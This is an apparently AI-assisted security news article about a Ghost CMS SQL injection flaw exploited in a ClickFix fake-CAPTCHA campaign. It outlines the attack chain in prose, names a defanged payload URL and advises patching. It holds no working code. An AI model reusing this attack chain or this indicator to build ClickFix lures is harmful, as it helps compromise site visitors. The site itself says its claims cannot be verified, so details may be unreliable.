Concise Cyber

Subscribe below for free to get these delivered straight to your inbox

Advertisements
,
Ghost CMS SQL Injection Vulnerability Fuels ClickFix Campaign Targeting 700+ Websites
Advertisements

A significant cybersecurity incident is underway, with threat actors actively exploiting a SQL injection vulnerability in the popular Ghost CMS platform. The vulnerability, identified as CVE-2026-26980, has been leveraged in a large-scale ClickFix campaign that has compromised over 700 websites across multiple sectors. Malicious activity was first detected on May 7, 2026, and is particularly concerning given the widespread use of Ghost CMS for blogs and online publications.

According to cybersecurity researchers, the vulnerability allows unauthorized access to Ghost CMS admin API keys. Once inside, attackers inject malicious JavaScript loaders at the bottom of pages. These loaders facilitate fake CAPTCHA attacks, a tactic designed to trick users into interacting with deceptive prompts. The attackers utilize a cloaking service, Adspect, to bypass security scanners and evade detection, making it more difficult to identify and block the malicious activity.

The attack chain involves a complex series of steps, beginning with the exploitation of CVE-2026-26980 to steal admin API keys. Subsequently, a traffic distribution script using Adspect is deployed, delivering payloads via clo4shara[.]xyz/11z77u3.php. A fake CAPTCHA iframe HTML element is used, and base64 commands are executed via the Windows Run dialog. This leads to the dropping of DLL/JavaScript payloads and the execution of a Windows executable.

The final stage of the ClickFix flow involves a fake Cloudflare/CAPTCHA dialog, further deceiving users and leading them to unknowingly execute Windows commands via PowerShell or the Run dialog. Anthropic, leveraging the Claude AI model, was instrumental in discovering this vulnerability. The Ghost CMS developers addressed the vulnerability in a recent update, version 6.19.1.

Security professionals are urging Ghost CMS users to immediately update to the latest version to mitigate the risk of compromise. The widespread nature of this campaign, targeting over 700 websites, underscores the importance of prompt patching and robust security practices for all CMS platforms. QiAnXin XLab, along with other security vendors, are actively tracking and analyzing this evolving threat.

This incident highlights the ongoing risks associated with vulnerabilities in open-source software and the importance of proactive security measures. Organizations using Ghost CMS, including those at Harvard University, Oxford University, and Auburn University, should prioritize patching and monitoring their systems for signs of compromise. The use of cloaking services like Adspect further complicates detection and remediation efforts, requiring a layered security approach involving both technical controls and user awareness training. Users should be wary of suspicious CAPTCHA prompts and avoid interacting with unfamiliar or unexpected dialogs.

Sources:

All articles are written here with the help of AI on the basis of openly available information which cannot be independently verified. We do strive to quote the relevant sources.The intent is only to summarise what is already reported in public forum in our own wordswith no intention to plagarise or copy other person’s work.The publisher has no intent to defame or cause offence to anyone, any person or any organisation at any moment.The publisher assumes no responsibility for any damage or loss caused by making decisions on the basis of whatever is published on cyberconcise.com.You’re advised to do your own checks and balances before making any decision, and owners and publishers of this website cannot be held accountable for its resulting ramifications.If you have any objections, concerns or point out anything factually incorrect, please reach out using the form on https://concisecyber.com/about/

Discover more from Concise Cyber

Subscribe now to keep reading and get access to the full archive.

Continue reading